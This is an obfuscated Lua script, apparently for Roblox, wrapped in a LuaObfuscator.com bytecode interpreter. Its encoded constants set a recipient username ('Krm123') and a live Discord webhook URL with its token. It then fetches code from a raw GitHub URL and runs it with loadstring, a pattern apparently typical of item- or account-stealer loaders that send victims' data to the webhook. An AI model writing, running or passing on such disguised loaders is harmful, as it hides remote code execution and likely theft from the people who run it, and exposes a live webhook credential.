--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v20,1,1));return "";end end else local v71=v2(v0(v20,16));if v19 then local v78=v5(v71,v19);v19=nil;return v78;else return v71;end end end);local function v21(v22,v23,v24)if v24 then local v72=0 -0 ;local v73;while true do if (v72==(0 -0)) then v73=(v22/((1 + 1)^(v23-(1 + 0))))%((2 + 0)^(((v24-((864 -(150 + 713)) + 0)) -(v23-(1038 -(69 + 119 + (2136 -1287))))) + 1 + 0 + 0)) ;return v73-(v73%(1556 -(905 + 650))) ;end end else local v74=(1 + 1)^(v23-(1487 -(624 + 862))) ;return (((v22%(v74 + v74))>=v74) and (561 -(149 + 411))) or ((3907 -2881) -(846 + 180)) ;end end local function v25()local v38=0 + 0 ;local v39;while true do if (v38==(3 -2)) then return v39;end if (v38==(0 -(1322 -(1268 + 54)))) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1011 -(132 + 878) ;end end end local function v26()local v40=0 -0 ;local v41;local v42;while true do if (v40==(1621 -(190 + 1431))) then v41,v42=v1(v16,v18,v18 + 2 + 0 + 0 );v18=v18 + (5 -3) ;v40=1 + 0 ;end if (v40==(2 -1)) then return (v42 * (198 + 58)) + v41 ;end end end local function v27()local v43,v44,v45,v46=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v46 * (9632169 + 7145047)) + (v45 * (188706 -123170)) + (v44 * (243 + 13)) + v43 ;end local function v28()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(344 -(50 + 128 + 165))) then v50=1 + 0 ;v51=(v21(v49,2 -1 ,1 + 10 + 9 ) * ((5 -(1687 -(772 + 912)))^(4 + 28))) + v48 ;v47=(1748 -(1560 + 187)) + 1 ;end if (v47==(2 + 0)) then v52=v21(v49,453 -(337 + 95) ,238 -(10 + 197) );v53=((v21(v49,(880 + 515) -(205 + 1158) )==(1 + 0)) and  -(1 -(145 -(108 + 37)))) or ((9 -7) -1) ;v47=(561 -(301 + 259)) + 2 ;end if (v47==((2728 -884) -(1066 + 775))) then if (v52==(43 -(35 + 8))) then if (v51==(1082 -(681 + 401))) then return v53 * (0 + 0) ;else local v91=0 + 0 ;while true do if ((689 -(417 + 272))==v91) then v52=1 -0 ;v50=0 + 0 + 0 ;break;end end end elseif (v52==(3306 -(1146 + (252 -(7 + 132))))) then return ((v51==((0 + 0) -0)) and (v53 * (((1265 -(242 + 1022)) + 0)/((1462 + 285) -(874 + 873))))) or (v53 * NaN) ;end return v8(v53,v52-(2008 -(584 + (1646 -(143 + 1102)))) ) * (v50 + (v51/(((2764 -1679) -(1042 + 41))^(844 -(520 + 272))))) ;end if (v47==0) then v48=v27();v49=v27();v47=1 + 0 ;end end end local function v29(v30)local v54=(4147 -2614) -(483 + 1050) ;local v55;local v56;while true do if (v54==(1 -0)) then v55=v3(v16,v18,(v18 + v30) -(1 + 0) );v18=v18 + v30 ;v54=1712 -(1705 + 5) ;end if (v54==(0 + 0)) then v55=nil;if  not v30 then local v87=1790 -(265 + 1525) ;while true do if (v87==(0 + 0)) then v30=v27();if (v30==0) then return "";end break;end end end v54=1374 -(678 + 695) ;end if (v54==(1913 -(585 + 1326))) then v56={};for v79=1 + (645 -(518 + 127)) , #v55 do v56[v79]=v2(v1(v3(v55,v79,v79)));end v54=1 + 2 ;end if (v54==(5 -2)) then return v6(v56);end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v57=0 -0 ;local v58;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v57==(1987 -(409 + 1574))) then while true do if (v58~=(1010 -(589 + 421))) then else local v88=1808 -(706 + 1102) ;while true do if (v88~=(462 -(128 + 334))) then else v59=0;v60=nil;v88=2 -1 ;end if (v88==1) then v58=1 -0 ;break;end end end if (v58==(2 + 1)) then v65=nil;while true do local v92=0 -0 ;local v93;while true do if (v92==(0 + 0)) then v93=1025 -(507 + 518) ;while true do if (v93~=(1 + 0)) then else if ((1 + 0)~=v59) then else local v114=0 -0 ;local v115;while true do if (v114~=(0 -0)) then else v115=260 -(72 + 188) ;while true do if (v115~=1) then else v65={};v59=6 -4 ;break;end if (v115==(1236 -(370 + 866))) then local v125=0;local v126;while true do if (v125==(0 + 0)) then v126=0 -0 ;while true do if (v126~=(1 + 0)) then else v115=1;break;end if (v126==(0 + 0)) then local v160=0;while true do if ((183 -(75 + 108))~=v160) then else v63={v60,v61,nil,v62};v64=v27();v160=1 + 0 ;end if ((1 + 0)~=v160) then else v126=704 -(482 + 221) ;break;end end end end break;end end end end break;end end end if (v59~=0) then else local v116=0 -0 ;local v117;local v118;while true do if (v116~=0) then else v117=0;v118=nil;v116=1646 -(949 + 696) ;end if (1==v116) then while true do if (v117~=0) then else v118=0;while true do if (v118~=(3 -2)) then else v62={};v59=1;break;end if (v118==(0 -0)) then local v150=859 -(58 + 801) ;while true do if ((644 -(360 + 283))==v150) then v118=1 + 0 ;break;end if (0==v150) then v60={};v61={};v150=1 -0 ;end end end end break;end end break;end end end break;end if (v93~=(0 + 0)) then else local v113=0;while true do if (v113==(690 -(342 + 347))) then v93=3 -2 ;break;end if ((719 -(495 + 224))==v113) then if (v59==2) then local v121=0 + 0 ;local v122;while true do if (v121~=(0 -0)) then else v122=0;while true do if (v122==(823 -(766 + 56))) then for v155=1768 -(223 + 1544) ,v27() do local v156=0 -0 ;local v157;local v158;while true do if (v156~=0) then else local v162=0 + 0 ;while true do if (v162==(0 -0)) then v157=1847 -(1033 + 814) ;v158=nil;v162=1448 -(535 + 912) ;end if (v162~=(1 -0)) then else v156=1 + 0 ;break;end end end if (1~=v156) then else while true do if (v157==0) then v158=v25();if (v21(v158,1 + 0 ,1)==0) then local v177=0 -0 ;local v178;local v179;local v180;local v181;while true do if (v177~=(9 -7)) then else while true do if (v178~=(0 + 0)) then else local v193=35 -(17 + 18) ;while true do if (v193==0) then v179=v21(v158,1879 -(350 + 1527) ,2 + 1 );v180=v21(v158,3 + 1 ,1750 -(799 + 945) );v193=3 -2 ;end if (v193~=(583 -(296 + 286))) then else v178=1 + 0 ;break;end end end if (v178~=1) then else local v194=247 -(187 + 60) ;local v195;while true do if ((0 -0)==v194) then v195=0 -0 ;while true do if (v195~=(1511 -(1337 + 174))) then else v181={v26(),v26(),nil,nil};if (v179==(221 -(4 + 217))) then local v209=0 + 0 ;local v210;local v211;while true do if (v209==0) then v210=1742 -(547 + 1195) ;v211=nil;v209=3 -2 ;end if (v209==(1 + 0)) then while true do if (v210~=0) then else v211=0;while true do if (v211~=(0 -0)) then else v181[3]=v26();v181[1925 -(1255 + 666) ]=v26();break;end end break;end end break;end end elseif (v179==(1177 -(687 + 489))) then v181[1 + 2 ]=v27();elseif (v179==(7 -5)) then v181[1 + 2 ]=v27() -(2^16) ;elseif (v179~=3) then else local v214=0 -0 ;local v215;while true do if (v214~=0) then else v215=1780 -(467 + 1313) ;while true do if (v215==(869 -(165 + 704))) then v181[3]=v27() -((7 -5)^(1891 -(99 + 1776))) ;v181[369 -(219 + 146) ]=v26();break;end end break;end end end v195=1;end if (v195~=(1 -0)) then else v178=2001 -(1641 + 358) ;break;end end break;end end end if (v178~=(3 + 0)) then else if (v21(v180,4 -1 ,3)~=(278 -(42 + 235))) then else v181[1 + 3 ]=v65[v181[4 + 0 ]];end v60[v155]=v181;break;end if ((2 + 0)~=v178) then else local v197=0 + 0 ;while true do if (v197==(1 + 0)) then v178=3 -0 ;break;end if ((0 -0)==v197) then if (v21(v180,1,1)~=(1 + 0)) then else v181[7 -5 ]=v65[v181[1 + 1 ]];end if (v21(v180,2 + 0 ,2)~=(1116 -(825 + 290))) then else v181[1477 -(1035 + 439) ]=v65[v181[664 -(30 + 631) ]];end v197=1 + 0 ;end end end end break;end if (v177~=0) then else v178=911 -(437 + 474) ;v179=nil;v177=1;end if (v177==(4 -3)) then v180=nil;v181=nil;v177=9 -7 ;end end end break;end end break;end end end v59=3;break;end if (v122==0) then local v151=0;local v152;while true do if (v151~=(51 -(14 + 37))) then else v152=0;while true do if (v152~=(0 -0)) then else local v163=0 -0 ;while true do if (v163~=(1 -0)) then else v152=1402 -(535 + 866) ;break;end if (v163~=0) then else for v186=1911 -(1419 + 491) ,v64 do local v187=0 -0 ;local v188;local v189;local v190;while true do if (v187==(1 + 0)) then v190=nil;while true do if (v188~=(0 -0)) then else v189=v25();v190=nil;v188=296 -(67 + 228) ;end if (1==v188) then if (v189==(1696 -(1347 + 348))) then v190=v25()~=0 ;elseif (v189==2) then v190=v28();elseif (v189~=(9 -6)) then else v190=v29();end v65[v186]=v190;break;end end break;end if (v187~=0) then else v188=0 -0 ;v189=nil;v187=1;end end end v63[792 -(636 + 153) ]=v25();v163=3 -2 ;end end end if (v152==1) then v122=1;break;end end break;end end end end break;end end end if (v59~=(6 -3)) then else local v123=0 -0 ;local v124;while true do if (v123==0) then v124=555 -(340 + 215) ;while true do local v135=0 + 0 ;while true do if (v135==(569 -(113 + 456))) then if (v124~=1) then else return v63;end if (v124~=0) then else local v161=0;while true do if (v161==(1620 -(1432 + 187))) then v124=1 + 0 ;break;end if (v161~=(1232 -(1226 + 6))) then else for v169=1433 -(295 + 1137) ,v27() do v61[v169-1 ]=v33();end for v171=2 -1 ,v27() do v62[v171]=v27();end v161=1 + 0 ;end end end break;end end end break;end end end v113=1;end end end end break;end end end break;end if ((1 + 0)==v58) then local v89=772 -(180 + 592) ;while true do if (v89==(1 + 0)) then v58=2;break;end if (v89~=0) then else v61=nil;v62=nil;v89=1;end end end if (v58~=(1 + 1)) then else local v90=0 -0 ;while true do if ((0 -0)~=v90) then else v63=nil;v64=nil;v90=1;end if (v90~=(1710 -(1175 + 534))) then else v58=6 -3 ;break;end end end end break;end if (v57~=(1696 -(1184 + 510))) then else v62=nil;v63=nil;v57=1 + 2 ;end if ((380 -(137 + 240))~=v57) then else v64=nil;v65=nil;v57=1600 -(1389 + 207) ;end if (v57==(4 -3)) then v60=nil;v61=nil;v57=4 -2 ;end if (v57~=(494 -(175 + 319))) then else v58=0 -0 ;v59=nil;v57=1 + 0 ;end end end local function v34(v35,v36,v37)local v66=0;local v67;local v68;local v69;while true do if (0==v66) then v67=v35[1];v68=v35[2];v66=1;end if (v66==1) then v69=v35[3];return function(...)local v81=0;local v82;local v83;local v84;local v85;local v86;while true do if (v81==0) then v82=1;v83= -1;v81=1;end if (1==v81) then v84={...};v85=v12("#",...) -1 ;v81=2;end if (2==v81) then v86=nil;v86=function()local v94=v67;local v95=v68;local v96=v69;local v97=v32;local v98={};local v99={};local v100={};for v104=148 -(39 + 109) ,v85 do if (((8320 -(6139 -(7 + 311)))>=(5944 -3706)) and (v104>=v96)) then v98[v104-v96 ]=v84[v104 + (746 -(628 + 117)) ];else v100[v104]=v84[v104 + (1 -0) ];end end local v101=(v85-v96) + 1 + 0 ;local v102;local v103;while true do local v105=0;local v106;while true do if (((5096 -(276 + 392))==(5531 -((361 -107) + 849))) and (v105==(1112 -(240 + 872)))) then v106=0 -0 ;while true do if ((v106==(0 + 0)) or ((1856 + 2614)==(2012 -(1635 + 136)))) then v102=v94[v82];v103=v102[1 -0 ];v106=1220 -(575 + 644) ;end if ((v106==(1 + 0)) or ((2772 -(230 + 336))>(4816 -(679 + 1068)))) then if (((3431 -(140 + 1135))==(3048 -(2694 -1802))) and (v103<=((434 -320) -(39 + 71)))) then if (((6377 -4956)<=(2220 -597)) and (v103<=1)) then if ((v103==(0 + 0)) or ((5700 -3726)>=((4612 -(225 + 1508)) + 899))) then do return;end else local v127=0 -0 ;local v128;while true do if ((v127==(778 -(331 + 447))) or ((13288 -(40648 -31826))>=(3669 + 1247))) then v128=v102[1917 -(1376 + 539) ];v100[v128]=v100[v128](v13(v100,v128 + 1 + 0 ,v83));break;end end end elseif (((4032 -1409)<(5004 -(273 + 313))) and (v103<=(1 + 1))) then local v129=0 -0 ;local v130;local v131;local v132;local v133;while true do if (((3954 -2042)==(9357 -7445)) and (v129==(5 -3))) then while true do if ((v130==(888 -(178 + 710))) or ((2459 + 534)<=(3499 -2093))) then v131=1527 -(1174 + 353) ;v132=nil;v130=2 -1 ;end if (((4330 -2409)>=(2222 -(96 + 316))) and (v130==(1 + 0))) then v133=nil;while true do if (((1827 + 765)>(1913 -529)) and (v131==(1854 -(1682 + (914 -(638 + 105)))))) then v100[v132 + (1138 -(1095 + 42)) ]=v133;v100[v132]=v133[v102[3 + 1 ]];break;end if ((v131==(0 -0)) or ((2077 -964)>(3561 -1822))) then local v167=0 -0 ;local v168;while true do if (((960 -628)<=(2902 + 1008)) and ((0 -0)==v167)) then v168=0 + 0 ;while true do if (((563 + 1423)<((9253 -6168) -(19 + 82 + 120))) and (v168==(1 + 0 + 0))) then v131=(5765 -4304) -(32 + 6 + 1422) ;break;end if ((((418 + 586) -(402 + 124))==(1162 -684)) and (v168==(0 + 0))) then local v191=682 -((156 -101) + 627) ;while true do if (((5037 -(64 + 255))>(5784 -(953 + 262))) and (v191==(1 + 0))) then v168=1513 -(202 + 1310) ;break;end if ((v191==(1607 -(694 + 913))) or ((3364 -(140 + 1509))==(1157 -745))) then v132=v102[2];v133=v100[v102[10 -7 ]];v191=1235 -(752 + (1054 -572)) ;end end end end break;end end end end break;end end break;end if ((v129==(0 -0)) or (((7915 -(228 + 114)) -3778)<=((3570 -1812) + 799))) then v130=0 + 0 ;v131=nil;v129=3 -2 ;end if ((v129==(1 + 0)) or ((2756 -(1235 + (609 -320)))>=(7685 -4918))) then v132=nil;v133=nil;v129=1892 -(1544 + 346) ;end end elseif ((v103>(1246 -(590 + 379 + 274))) or ((4034 -(460 + 26))<=((3377 + 1182) -(1382 + 397)))) then if ((v102[2 -0 ]==v100[v102[(1019 -(7 + 323)) -(411 + 274) ]]) or ((2621 + 1378)<=(2026 -(1359 + 103)))) then v82=v82 + (1 -0) ;else v82=v102[2 + 1 ];end else v100[v102[1 + 1 ]]();end elseif ((v103<=(1522 -(718 + 797))) or ((8996 -6980)>(5712 -(832 + 875)))) then if ((v103<=(1 + 4)) or ((2238 + 660 + 31)<(2427 -(15 + 488)))) then if (((3964 -(2968 -(232 + 1210)))<(4700 -(1256 + 559))) and (v100[v102[863 -(53 + 808) ]]==v102[1659 -(839 + 816) ])) then v82=v82 + 1 ;else v82=v102[3 + 0 ];end elseif ((v103==(1654 -(839 + 809))) or ((1881 -(80 + 1490))>(2643 -(115 + 91 + 1706)))) then v37[v102[3]]=v100[v102[2 + 0 ]];else v100[v102[5 -(1242 -(336 + 903)) ]]=v102[8 -5 ];end elseif ((v103<=(489 -((207 -113) + 387))) or ((1595 + 1579)<(8063 -5154))) then v82=v102[(10 -6) -1 ];elseif (((10937 -6535)>((1255 -(378 + 846)) + 330)) and (v103==(5 + 3 + 1))) then v100[v102[2]]=v37[v102[197 -(158 + (1811 -(1526 + 249))) ]];else local v143=0 -0 ;local v144;local v145;local v146;local v147;local v148;local v149;while true do if (((5806 -3566)==(1241 + 999)) and (v143==2)) then v148=nil;v149=nil;v143=3 + 0 ;end if (((9983 -(10646 -5340))>(425 -186)) and (v143==(0 + 0))) then v144=0 -0 ;v145=nil;v143=890 -(453 + 436) ;end if (((2029 -(115 + 233))>=((1292 -949) -197)) and (v143==(1 + 2))) then while true do if (((3919 -1409)<=(1670 + 3280)) and (v144==(1268 -(115 + 1153)))) then v145=1106 -(714 + 392) ;v146=nil;v144=3 -2 ;end if (((566 + 71)<=((18408 -10877) -4653)) and (v144==2)) then v149=nil;while true do if (((3174 -560)>113) and (v145==(551 -(24 + 45 + 481)))) then local v173=630 -(5 + 625) ;local v174;while true do if ((v173==(0 + 0)) or ((4042 -1452)==(1012 + 255))) then v174=(884 -(244 + 640)) + 0 ;while true do if ((v174==(2 -1)) or ((8842 -6174)<=((4429 -(1338 + 419)) -1067))) then v145=1884 -(1766 + 116) ;break;end if ((v174==(809 -(142 + 667))) or ((285 -95)>(524 + 3981))) then v83=(v148 + v146) -(654 -(637 + 16)) ;v149=0;v174=1 + 0 ;end end break;end end end if ((v145==(0 -0)) or (((4721 -(852 + 907)) -((720 -572) + 670))>3961)) then local v175=1126 -(639 + 487) ;local v176;while true do if (((2041 -1314)<=(3161 -(677 + (573 -327)))) and (v175==(983 -(323 + (1502 -(35 + 807)))))) then v176=0 -0 ;while true do if (((3112 -(172 + 83 + 51))>(4092 -1431)) and ((4 -3)==v176)) then v145=1;break;end if ((v176==(329 -(326 + 3))) or ((5891 -(649 + 750))<(1273 -(332 + 586)))) then v146=v102[(3 -2) + 1 ];v147,v148=v97(v100[v146](v13(v100,v146 + ((3 + 0) -2) ,v102[(60 + 0) -(14 + 43) ])));v176=1;end end break;end end end if ((v145==(2 + 0)) or ((4651 -(773 + 265))<(9580 -5984))) then for v183=v146,v83 do local v184=0 + (0 -0) ;local v185;while true do if ((v184==(0 -0)) or ((5081 -((2040 -(1035 + 31)) + 455))<=(251 + 268))) then v185=1690 -(932 + 758) ;while true do if ((v185==(0 -0)) or ((5743 -4051)<(194 + 1012))) then v149=v149 + 1 + 0 ;v100[v183]=v147[v149];break;end end break;end end end break;end end break;end if ((v144==(1 -0)) or ((11312 -8034)>=(2553 + 1837))) then v147=nil;v148=nil;v144=5 -3 ;end end break;end if (((2299 -1086)==((5568 -4438) + 83)) and (v143==(1 + 0))) then v146=nil;v147=nil;v143=5 -3 ;end end end v82=v82 + (1371 -(1153 + (851 -634))) ;break;end end break;end end end end;v81=3;end if (v81==3) then A,B=v32(v11(v86));if  not A[1] then local v107=0;local v108;while true do if (0==v107) then v108=v35[4][v82] or "?" ;error("Script error at ["   .. v108   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D6503083O004B726D31323O3303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313034362O3238333534393034333637322O352F6766566570683276634A6856684E726A5037635261584871502D386836416E5A594E7A523268722O4248524E7141305459732D70744E484D423341506D4E487548717641026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756100143O0012073O00013O0026053O0008000100010004083O00080001001207000100033O001206000100023O001207000100053O001206000100043O0012073O00063O000E040006000100013O0004083O00010001001209000100073O001209000200083O0020020002000200090012070004000A4O000A000200044O000100013O00022O00030001000100010004083O001300010004083O000100016O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
